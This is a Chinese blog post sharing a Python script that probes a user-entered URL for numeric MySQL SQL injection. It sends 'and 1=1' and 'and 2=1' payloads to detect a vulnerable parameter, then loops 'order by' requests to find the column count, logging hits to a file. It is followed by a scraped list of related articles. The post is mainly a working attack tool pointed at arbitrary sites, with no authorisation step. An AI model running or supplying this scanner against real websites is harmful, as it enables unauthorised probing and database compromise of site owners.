前言:

总是想写一个sql注入脚本,但是之前的那些都不行。

这次做好了准备,然后嘿嘿嘿。

准备:

sql注入的基础知识

熟悉怎么判断

正文:

思路概念图:

这里我没有限制用户输入,不限制的话可能会 @&#@*#&@* = =

代码:

import requests

from bs4 import BeautifulSoup

import time

import re

import sys

def user():

    wailtfor=input('请输入你要进行sql注入测试的url:')

    print('------开启第一重验证------')

    url="{}".format(wailtfor)

    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}

    request=requests.get(url=url,headers=headers,timeout=6)

    if request.status_code != 200:

        print('[-]抱歉该url十分的不稳定,退出程序中......')

        time.sleep(1)

        sys.exit()

    else:

        print('[+]第一重验证已经完成,目标是稳定的')

        journal=open('journal.txt','w',encoding='utf-8')

        journal.write('{}是稳定的\n'.format(url))

        journal.write('下一步进行判断是否存在注入')

        journal.close()

    print('------开启第二重测试------')

    def ceshi():

        pay1 = '%20and%201=1'

        pay2 = '%20and%202=1'

        Testinjection1 = request.url + pay1

        Testinjection2=request.url+pay2

        print('-------尝试数字型注入------')

        print(Testinjection1)

        print(Testinjection2)

        Testg=requests.get(Testinjection1,headers=headers)

        print(Testg.headers)

        Testg2=requests.get(Testinjection2,headers=headers)

        print(Testg2.headers)

        if Testg.text != Testg2.text:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2 = open('journal.txt', 'a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2.close()

            print('------开始猜字段数------')

        elif Testg.headers != Testg2.headers:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')

            journal2=open('journal.txt','a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))

            journal2.close()

            print('------开始猜字段数------')

        else:

            print('[-]数字型注入失败')

            print('[!]尝试字符型注入')

            sys.exit()

        a='ooo'

        for s in range(1,100):

            if a=='xxx':break

            orpay=url+'%20order%20by%20{}'.format(s)

            res=requests.get(orpay,headers=headers)

            ewe=res.content

            lk=re.finditer('mysql_fetch_array()',str(ewe))

            for p in lk:

                print(str(p))

                g='''<_sre.SRE_Match object; span=(232, 249), match='mysql_fetch_array'>'''

                if str(p) == g:

                    print('字段数payload:', res.url)

                    dw = int(res.url[-1:])-1

                    print(type(dw))

                    print('字段数长度为:', dw)

                    a='xxx'

                else:

                    print('字段数payload:',res.url)

                    dw=int(res.url[-1:])-1

                    print('字段数长度为:',dw)

                    a='xxx'

    ceshi()

user()

  测试结果如下:

代码还有很多不足,诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌:

python打造一个Mysql数字类型注入脚本(1)的更多相关文章

  1. python打造一个分析网站SQL注入的脚本

    前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...

  2. MySQL数字类型中的三种常用种类

    数字类型 MySQL数字类型按照我的分类方法分为三类:整数类.小数类和数字类. MySQL数字类型之一我所谓的“数字类” 就是指 DECIMAL 和 NUMERIC,它们是同一种类型.它严格的说不是一 ...

  3. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  4. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  5. 《Python核心编程》数字类型

    1.数字类型简单介绍 Python中数字类型包含:整型.长整型.布尔型.双精度浮点型.十进制浮点型.复数.这些数字类型都是不可变类型.也就是说,改变了数字的值会生成新的对象. 在Python中删除数字 ...

  6. MySQL数字类型学习笔记

    数字类型 最近在看<MySQL技术内幕:SQL编程>并做了笔记,所以本博客是一篇笔记类型博客,分享出来方便自己复习,也可以帮助他人 整型 类型 占用空间 最小值(SIGNED) 最大值(S ...

  7. MySQL数字类型int与tinyint、float与decimal如何选择

    最近在准备给开发做一个mysql数据库开发规范方面培训,一步一步来,结合在生产环境发现的数据库方面的问题,从几个常用的数据类型说起. int.tinyint与bigint 它们都是(精确)整型数据类型 ...

  8. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  9. python基本数据类型之数字类型和其相关运算

    数字(number) Python3 支持 int.float.bool.complex(复数). 在Python 3里,只有一种整数类型 int,表示为长整型,没有 python2 中的 Long. ...

随机推荐

  1. 数据库(Oracle)运维工作内容及常用脚本命令

    1.系统资源状况:--内存及CPU资源  --linux,solaris,aix    vmstat 5  --说明:    1)观察空闲内存的数量多少,以及空闲内存量是否稳定,如果不稳定就得想办法来 ...

  2. Mybatis学习笔记二

    本篇内容,紧接上一篇内容Mybatis学习笔记一 输入映射和输出映射 传递简单类型和pojo类型上篇已介绍过,下面介绍一下包装类型. 传递pojo包装对象 开发中通过可以使用pojo传递查询条件.查询 ...

  3. Java基础学习笔记七 Java基础语法之继承和抽象类

    继承 继承的概念 在现实生活中,继承一般指的是子女继承父辈的财产.在程序中,继承描述的是事物之间的所属关系,通过继承可以使多种事物之间形成一种关系体系. 例如公司中的研发部员工和维护部员工都属于员工, ...

  4. C#添加背景音乐

    <MediaElement Name="audio"/> <Button Name="music" Content="点我有音乐哦& ...

  5. chrome浏览器访问google插件

    访问google其实很多时候都是为了搜索资料,本文分享下,chrome浏览器访问google插件 下载地址:http://www.ggfwzs.com/ 1,下载完成后,解压: 如下: 2,打开谷歌浏 ...

  6. 201621123068 作业07-Java GUI编程

    1. 本周学习总结 1.1 思维导图:Java图形界面总结 2.书面作业 1. GUI中的事件处理 1.1 写出事件处理模型中最重要的几个关键词. 注册.事件.事件源.监听 1.2 任意编写事件处理相 ...

  7. JAVA_SE基础——70.Math类

    package cn.itcast.other; /*  Math 数学类, 主要是提供了很多的数学公式.    abs(double a)  获取绝对值  ceil(double a)  向上取整 ...

  8. SecureCRT 7.3注册机激活

    SecureCRT是一款很好用的远程登陆管理工具 工具和注册机下载链接:http://pan.baidu.com/s/1jImWiMU 密码:0yox 以管理管运行keygen.exe(一定要以管理员 ...

  9. 深度爬取之rules

    深度爬取之rules CrawlSpider使用rules来决定爬虫的爬取规则,并将匹配后的url请求提交给引擎.所以在正常情况下,CrawlSpider不需要单独手动返回请求了. 在rules中包含 ...

  10. python RE模块的使用

    摘要: re模块包括操作正则表达式的函数,一些工作中都需要用到,现在说明下使用方法. 使用说明: 一,re模块下的函数:            函数             描述 compile(pa ...